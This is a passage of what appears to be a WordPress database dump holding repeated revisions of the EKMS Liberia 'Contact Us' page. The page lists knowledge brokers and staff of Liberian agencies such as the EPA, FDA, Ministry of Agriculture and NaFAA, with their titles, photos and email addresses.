LGS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Wonpue Quellian </strong><br />Research Officer<br />MME<br /><a href=\"mailto:wonpuequellian2017@gmail.com\">wonpuequellian2017@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />Division of Knowledge Management &amp; Archive<br />MOCI<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Anthony A. Yokie</strong>\n</br>\nManager\n</br>\nDepartment of Marine Fisheries and Environment\n</br>\nNaFAA\n</br>\n<a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p><p><strong>Urias B. Barclay</strong><br />Environmental Technician<br />NaFAA<br /><a href=\"mailto:ubbarclay@gmail.com\">ubbarclay@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Albert M. Sherman </strong><br />MOT<br /><a href=\"mailto:itssherman@gmail.com\">itssherman@gmail.com</a></p><p><strong>Amos Borbor </strong><br />MOT<br /><a href=\"mailto:felixborbor@gmail.com\">felixborbor@gmail.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p><strong>Henry A. Simpson </strong><br />MOT<br /><a href=\"mailto:ransford2024@gmail.com\">ransford2024@gmail.com</a></p><p><strong>James Kollie </strong><br />MOT<br /><a href=\"mailto:jameskollie@yahoo.com\">jameskollie@yahoo.com</a></p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-03-25 08:43:52','2021-03-25 08:43:52','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3626,42,'2021-03-25 08:43:52','2021-03-25 08:43:52','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/konikay-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely BSc, MSc.</strong><br />EIA Manager<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll BSc, MSc.</strong><br />Technical Manager Conservation Department<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Joseph G. Duolupeh BSc, MPSM.</strong><br />Manager, Strategic Planning Unit<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Francis W. Mwah</strong><br />Agricultural Economist<br />MOA<br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>Jlopleh Dennis Wiagbe </strong><br />Director/M&amp;E<br />MOA<br /><a href=\"mailto:jdmne12@gmail.com\">jdmne12@gmail.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p><strong>Halala Willie Kokulo </strong><br />Director/Crop Resources<br />MOA<br /><a href=\"mailto:kokulohalala@gmail.com\">kokulohalala@gmail.com</a></p><p><strong>Roosevelt Carlos Reeves </strong><br />Agricultural Mechanization Technologist<br />MOA<br /><a href=\"mailto:rcreeves@gmail.com\">rcreeves@gmail.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Anthony Kullie</strong><br />Director of LHS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Ernest M. Menseah </strong><br />Director of LGS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Wonpue Quellian </strong><br />Research Officer<br />MME<br /><a href=\"mailto:wonpuequellian2017@gmail.com\">wonpuequellian2017@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />Division of Knowledge Management &amp; Archive<br />MOCI<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Anthony A. Yokie</strong>\n</br>\nManager\n</br>\nDepartment of Marine Fisheries and Environment\n</br>\nNaFAA\n</br>\n<a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p><p><strong>Urias B. Barclay</strong><br />Environmental Technician<br />NaFAA<br /><a href=\"mailto:ubbarclay@gmail.com\">ubbarclay@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Albert M. Sherman </strong><br />MOT<br /><a href=\"mailto:itssherman@gmail.com\">itssherman@gmail.com</a></p><p><strong>Amos Borbor </strong><br />MOT<br /><a href=\"mailto:felixborbor@gmail.com\">felixborbor@gmail.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p><strong>Henry A. Simpson </strong><br />MOT<br /><a href=\"mailto:ransford2024@gmail.com\">ransford2024@gmail.com</a></p><p><strong>James Kollie </strong><br />MOT<br /><a href=\"mailto:jameskollie@yahoo.com\">jameskollie@yahoo.com</a></p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-03-25 08:43:52','2021-03-25 08:43:52','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3627,42,'2021-03-25 08:43:52','2021-03-25 08:43:52','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/konikay-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely BSc, MSc.</strong><br />EIA Manager<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll BSc, MSc.</strong><br />Technical Manager Conservation Department<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Joseph G. Duolupeh BSc, MPSM.</strong><br />Manager, Strategic Planning Unit<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Francis W. Mwah</strong><br />Agricultural Economist<br />MOA<br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>Jlopleh Dennis Wiagbe </strong><br />Director/M&amp;E<br />MOA<br /><a href=\"mailto:jdmne12@gmail.com\">jdmne12@gmail.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p><strong>Halala Willie Kokulo </strong><br />Director/Crop Resources<br />MOA<br /><a href=\"mailto:kokulohalala@gmail.com\">kokulohalala@gmail.com</a></p><p><strong>Roosevelt Carlos Reeves </strong><br />Agricultural Mechanization Technologist<br />MOA<br /><a href=\"mailto:rcreeves@gmail.com\">rcreeves@gmail.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Anthony Kullie</strong><br />Director of LHS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Ernest M. Menseah </strong><br />Director of LGS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Wonpue Quellian </strong><br />Research Officer<br />MME<br /><a href=\"mailto:wonpuequellian2017@gmail.com\">wonpuequellian2017@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		